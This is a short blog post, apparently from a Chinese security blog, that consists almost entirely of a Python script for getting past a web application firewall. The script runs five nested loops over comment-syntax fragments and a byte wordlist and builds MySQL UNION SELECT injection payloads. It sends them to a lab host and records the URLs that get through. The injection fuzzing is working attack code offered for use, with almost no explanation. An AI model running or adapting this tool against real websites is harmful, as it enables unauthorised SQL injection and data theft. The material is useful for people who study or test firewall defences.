Ca1s1'Blog

Bypass Waf Script

2020/06/18
# encoding=utf-8

import requests
import random

url = "http://192.168.235.133/2.php?a=1"
Fuzz_a = ['/*!14450','*/','/**/','/','-','+']
#Fuzz_a = ['']
Fuzz_b = ['']
#Fuzz_c = ['%0a','%0b','%0c','%0d','%0e','%0f','%0h','%0i','%0j']
Fuzz_c = []
# Load one fuzz value per line from the wordlist file
with open('HexValsAllBytes.txt','r') as wordlist:
    for line in wordlist:
        Fuzz_c.append(line.strip('\n'))

# Build the fuzz dictionary
FUZZ = Fuzz_a+Fuzz_b+Fuzz_c
# Set the request headers
header = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0'}
# Use nested for loops to combine the fuzz dictionary entries and request the page
for a in FUZZ:
    for b in FUZZ:
        for c in FUZZ:
            for d in FUZZ:
                for e in FUZZ:
                    PAYLOAD = "/*!uNion"+a+b+c+d+e+"seLect*/1,3333"
                    urlp = url+PAYLOAD
                    #print(urlp)
                    res = requests.get(urlp,headers=header)
                    #print(res.text)
                    # This flag needs to be changed: use a string that always
                    # appears in the normal page of the target you are testing
                    if '1xiaobai13333' in res.text:
                        print("[*]URL:"+ urlp +"BYPASS!")
                        # Append the URL to the results file; the with block
                        # closes it (the original f.close was never called)
                        with open('result.txt','a') as f:
                            f.write(urlp+"\n")

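Original author: Fidcer

Original link: https://vuln.top/2020/06/18/bypass/

Published: June 18th 2020, 2:04:16 pm

Updated: June 18th 2020, 2:04:16 pm

Copyright notice: This article is licensed under the Creative Commons Attribution-NonCommercial 4.0 International License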